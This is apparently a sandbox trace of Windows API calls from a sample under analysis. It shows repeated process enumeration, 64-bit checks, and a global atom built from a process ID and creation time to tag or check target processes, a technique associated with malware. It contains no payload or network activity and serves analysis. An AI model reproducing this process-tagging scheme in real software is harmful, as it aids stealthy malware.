	[0082.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x3d0
	[0082.530] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.530] CloseHandle (hObject=0x3d0) returned 1
	[0082.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x3d0
	[0082.530] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.530] CloseHandle (hObject=0x3d0) returned 1
	[0082.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x3d0
	[0082.531] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.531] CloseHandle (hObject=0x3d0) returned 1
	[0082.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x3d0
	[0082.531] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.531] CloseHandle (hObject=0x3d0) returned 1
	[0082.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x3d0
	[0082.531] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0082.531] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0082.531] GetProcessTimes (in: hProcess=0x3d0, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0082.532] wsprintfA (in: param_1=0x753218, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0082.532] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0082.532] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0082.532] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0082.532] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0082.532] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0082.532] CloseHandle (hObject=0x3d0) returned 1
	[0082.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0082.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0082.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x3d0
	[0082.533] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.533] CloseHandle (hObject=0x3d0) returned 1
	[0082.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0082.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0082.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0082.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0082.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0082.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0082.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0082.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0082.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0082.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0082.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0082.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0082.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0082.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0082.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0082.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0082.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0082.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0082.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x3e0
	[0082.757] IsWow64Process (in: hProcess=0x3e0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.757] CloseHandle (hObject=0x3e0) returned 1
	[0082.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0082.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0082.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x3e0
	[0082.757] IsWow64Process (in: hProcess=0x3e0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.757] CloseHandle (hObject=0x3e0) returned 1
	[0082.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0082.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x3e0
	[0082.757] IsWow64Process (in: hProcess=0x3e0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.757] CloseHandle (hObject=0x3e0) returned 1
	[0082.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x3e0
	[0082.757] IsWow64Process (in: hProcess=0x3e0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.757] CloseHandle (hObject=0x3e0) returned 1
	[0082.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x3e0
	[0082.758] IsWow64Process (in: hProcess=0x3e0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.758] CloseHandle (hObject=0x3e0) returned 1
	[0082.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x3e0
	[0082.758] IsWow64Process (in: hProcess=0x3e0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.758] CloseHandle (hObject=0x3e0) returned 1
	[0082.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x3e0
	[0082.758] IsWow64Process (in: hProcess=0x3e0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.758] CloseHandle (hObject=0x3e0) returned 1
	[0082.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x3e0
	[0082.758] IsWow64Process (in: hProcess=0x3e0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.758] CloseHandle (hObject=0x3e0) returned 1
	[0082.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0082.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x3e0
	[0082.758] IsWow64Process (in: hProcess=0x3e0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.758] CloseHandle (hObject=0x3e0) returned 1
	[0082.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x3e0
	[0082.759] IsWow64Process (in: hProcess=0x3e0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.759] CloseHandle (hObject=0x3e0) returned 1
	[0082.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x3e0
	[0082.759] IsWow64Process (in: hProcess=0x3e0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.759] CloseHandle (hObject=0x3e0) returned 1
	[0082.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0082.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x3e0
	[0082.759] IsWow64Process (in: hProcess=0x3e0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.759] CloseHandle (hObject=0x3e0) returned 1
	[0082.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x3e0
	[0082.759] IsWow64Process (in: hProcess=0x3e0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.759] CloseHandle (hObject=0x3e0) returned 1
	[0082.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x3e0
	[0082.759] IsWow64Process (in: hProcess=0x3e0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.759] CloseHandle (hObject=0x3e0) returned 1
	[0082.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x3e0
	[0082.759] IsWow64Process (in: hProcess=0x3e0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.760] CloseHandle (hObject=0x3e0) returned 1
	[0082.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x3e0
	[0082.760] IsWow64Process (in: hProcess=0x3e0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.760] CloseHandle (hObject=0x3e0) returned 1
	[0082.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x3e0
	[0082.760] IsWow64Process (in: hProcess=0x3e0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.760] CloseHandle (hObject=0x3e0) returned 1
	[0082.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x3e0
	[0082.760] IsWow64Process (in: hProcess=0x3e0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.760] CloseHandle (hObject=0x3e0) returned 1
	[0082.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x3e0
	[0082.760] IsWow64Process (in: hProcess=0x3e0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.760] CloseHandle (hObject=0x3e0) returned 1
	[0082.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x3e0
	[0082.760] IsWow64Process (in: hProcess=0x3e0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.760] CloseHandle (hObject=0x3e0) returned 1
	[0082.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x3e0
	[0082.761] IsWow64Process (in: hProcess=0x3e0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.761] CloseHandle (hObject=0x3e0) returned 1
	[0082.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x3e0
	[0082.761] IsWow64Process (in: hProcess=0x3e0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.761] CloseHandle (hObject=0x3e0) returned 1
	[0082.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x3e0
	[0082.761] IsWow64Process (in: hProcess=0x3e0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.761] CloseHandle (hObject=0x3e0) returned 1
	[0082.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x3e0
	[0082.761] IsWow64Process (in: hProcess=0x3e0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.761] CloseHandle (hObject=0x3e0) returned 1
	[0082.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x3e0
	[0082.761] IsWow64Process (in: hProcess=0x3e0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.761] CloseHandle (hObject=0x3e0) returned 1
	[0082.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x3e0
	[0082.761] IsWow64Process (in: hProcess=0x3e0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.761] CloseHandle (hObject=0x3e0) returned 1
	[0082.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x3e0
	[0082.761] IsWow64Process (in: hProcess=0x3e0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.762] CloseHandle (hObject=0x3e0) returned 1
	[0082.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x3e0
	[0082.762] IsWow64Process (in: hProcess=0x3e0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.762] CloseHandle (hObject=0x3e0) returned 1
	[0082.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x3e0
	[0082.762] IsWow64Process (in: hProcess=0x3e0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.762] CloseHandle (hObject=0x3e0) returned 1
	[0082.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x3e0
	[0082.762] IsWow64Process (in: hProcess=0x3e0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.762] CloseHandle (hObject=0x3e0) returned 1
	[0082.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x3e0
	[0082.762] IsWow64Process (in: hProcess=0x3e0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.762] CloseHandle (hObject=0x3e0) returned 1
	[0082.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x3e0
	[0082.763] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0082.763] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0082.763] GetProcessTimes (in: hProcess=0x3e0, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0082.763] wsprintfA (in: param_1=0x758e80, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0082.763] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0082.763] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0082.764] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0082.764] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0082.764] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0082.764] CloseHandle (hObject=0x3e0) returned 1
	[0082.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0082.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0082.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x3e0
	[0082.764] IsWow64Process (in: hProcess=0x3e0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.764] CloseHandle (hObject=0x3e0) returned 1
	[0082.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0082.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0082.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0082.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0082.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0082.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0082.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0082.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0082.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0082.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0082.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0082.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0082.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0082.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0082.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0082.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0082.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0082.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0082.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x45c
	[0082.816] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.816] CloseHandle (hObject=0x45c) returned 1
	[0082.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0082.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0082.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x45c
	[0082.817] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.817] CloseHandle (hObject=0x45c) returned 1
	[0082.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0082.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x45c
	[0082.817] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.817] CloseHandle (hObject=0x45c) returned 1
	[0082.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x45c
	[0082.817] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.817] CloseHandle (hObject=0x45c) returned 1
	[0082.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x45c
	[0082.817] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.817] CloseHandle (hObject=0x45c) returned 1
	[0082.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x45c
	[0082.818] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.818] CloseHandle (hObject=0x45c) returned 1
	[0082.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x45c
	[0082.818] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.818] CloseHandle (hObject=0x45c) returned 1
	[0082.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x45c
	[0082.818] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.818] CloseHandle (hObject=0x45c) returned 1
	[0082.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0082.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x45c
	[0082.818] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.818] CloseHandle (hObject=0x45c) returned 1
	[0082.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x45c
	[0082.818] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.818] CloseHandle (hObject=0x45c) returned 1
	[0082.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x45c
	[0082.819] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.819] CloseHandle (hObject=0x45c) returned 1
	[0082.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0082.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x45c
	[0082.819] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.819] CloseHandle (hObject=0x45c) returned 1
	[0082.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x45c
	[0082.819] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.819] CloseHandle (hObject=0x45c) returned 1
	[0082.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x45c
	[0082.819] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.819] CloseHandle (hObject=0x45c) returned 1
	[0082.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x45c
	[0082.819] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.820] CloseHandle (hObject=0x45c) returned 1
	[0082.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x45c
	[0082.820] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.820] CloseHandle (hObject=0x45c) returned 1
	[0082.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x45c
	[0082.820] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.820] CloseHandle (hObject=0x45c) returned 1
	[0082.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x45c
	[0082.820] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.820] CloseHandle (hObject=0x45c) returned 1
	[0082.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x45c
	[0082.820] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.820] CloseHandle (hObject=0x45c) returned 1
	[0082.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x45c
	[0082.820] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.820] CloseHandle (hObject=0x45c) returned 1
	[0082.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x45c
	[0082.821] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.821] CloseHandle (hObject=0x45c) returned 1
	[0082.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x45c
	[0082.821] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.821] CloseHandle (hObject=0x45c) returned 1
	[0082.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x45c
	[0082.821] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.821] CloseHandle (hObject=0x45c) returned 1
	[0082.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x45c
	[0082.821] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.821] CloseHandle (hObject=0x45c) returned 1
	[0082.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x45c
	[0082.821] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.821] CloseHandle (hObject=0x45c) returned 1
	[0082.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x45c
	[0082.821] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.821] CloseHandle (hObject=0x45c) returned 1
	[0082.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x45c
	[0082.822] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.822] CloseHandle (hObject=0x45c) returned 1
	[0082.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x45c
	[0082.822] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.822] CloseHandle (hObject=0x45c) returned 1
	[0082.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x45c
	[0082.822] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.822] CloseHandle (hObject=0x45c) returned 1
	[0082.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x45c
	[0082.822] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.822] CloseHandle (hObject=0x45c) returned 1
	[0082.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x45c
	[0082.822] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.822] CloseHandle (hObject=0x45c) returned 1
	[0082.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x45c
	[0082.823] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0082.823] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0082.823] GetProcessTimes (in: hProcess=0x45c, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0082.823] wsprintfA (in: param_1=0x759ba0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0082.823] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0082.824] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0082.824] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0082.824] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0082.824] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
